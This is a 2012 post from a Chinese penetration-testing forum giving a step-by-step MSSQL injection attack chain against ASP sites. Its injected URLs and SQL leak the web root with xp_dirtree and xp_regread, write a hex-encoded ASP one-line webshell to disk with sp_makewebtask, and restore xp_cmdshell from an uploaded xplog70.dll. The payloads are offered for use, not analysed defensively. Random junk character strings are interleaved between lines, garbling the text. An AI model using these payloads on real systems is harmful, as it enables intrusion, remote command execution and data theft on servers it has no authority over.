中国网络渗透测试联盟
标题:
MSsqlL注入取得网站路径最好的方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:20
标题:
MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
" p( g4 \ Y. Z* C
假设我们在test里有两个文件夹test1和test2在test1里又有test3
+ c: J3 d) Z" v2 O- P& v: P% D5 V7 m- t
结果显示
9 [$ P5 H6 \6 C: i- b
0 _+ Q( l; w5 P' J3 @7 V" N
subdirectory depth
; y" E6 X0 |/ ?2 z$ q
test1 1
" k' V: }: E2 U: P# B) ?: R
test3 2
2 d+ ~# z/ T7 F0 E' B( E5 l/ _8 h" M
test2 1
; q- Q$ H- o5 z. Y
" |, ^/ m3 f; z* X( d3 z! H
哈哈发现没有那个depth就是目录的级数
2 e+ x/ U' f4 d
ok了,知道怎么办了吧
" y! H- D( e" G
: C- J' J. V A3 y! u- w. Q
http://www.xxxxx.com/down/list.asp?id=1;create
table dirs(paths varchar(1000),id int)--
: u7 j$ o# [; s7 G; r. |
http://www.xxxxx.com/down/list.asp?id=1;insert
dirs exec master.dbo.xp_dirtree 'd:\' --
; R5 ]8 h7 {0 t5 ^) E0 b+ p/ @
http://www.xxxxx.com/down/list.asp?id=1
and 0<>(select top 1 paths from dirs where id=1)-
3 p( Z* r+ Z- j
) K% I/ b6 d3 O% w" R I
只要加上id=1,就是第一级目录 。
2 n$ f# I. R" ]; C2 C7 @$ [/ ]
% H% s0 e% ^5 p5 s* s6 q3 Y
: R7 z+ a1 T, Z
通过注册表读网站路径:
' }0 j5 H9 C$ H+ ]- M F
1 H) `' w, J+ M; l* ]
1.;create table [dbo].[cyfd] ([gyfd][char](255));
# I$ F) Y# x6 C; \6 S
) n4 X" U' G0 b+ l6 U
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
+ { a, i- h2 U: x3 Q: K
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
' y. E/ L) N# g/ N9 e
: E1 s c+ e2 f9 i
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
3 u7 t$ Q( j! R' i
and 1=(select count(*) from cyfd where gyfd > 1)
# X1 J5 S" J0 I# n' W
这样IE报错,就把刚才插进去的Web路径的值报出来了
8 ?! ~4 b. i! p$ P2 }- v
0 U$ ~ J5 o ?1 E x
4.drop table cyfd;-- 删除临时表
* p# ^0 K8 h! X# m4 Z3 C6 V
0 A, o7 I/ _6 c% I& C3 l+ L: j
获得webshell方法:
9 K! S/ k- |1 I/ C. @1 V9 x& O
1.create table cmd (a image)-- \**cmd是创建的临时表
: l& g1 c" V" n" e2 H8 q: G% q
1 F' s. J8 q. ]3 }
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
% y y$ n6 i# m/ D3 `: l
4 L. C! ^' H+ @4 y3 y: }7 Z
; E6 q! J$ d) Q5 ]
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
& k# S& s5 d/ q% l& P# @
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
" v R+ ?: ~2 m1 B8 r4 Z6 }- L
% M' i; a* `7 B) O
4.drop table cmd;-- 删除cmd临时表
( [4 G! R8 _, v; T
4 u" Q* g: Z. g' e& L- ]
恢复xp_cmdshell方法之一:
, ~$ e9 [- A5 L! j+ B" l
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
1 A. p) q7 b1 v7 Q* C* C
http://www.something.com/script.asp?id=2;EXEC
master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
% t5 L, b2 d5 ~% y/ M* T4 S# D
恢复,支持绝对路径的恢复哦。:)
0 | O. c2 o% z" j. V
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2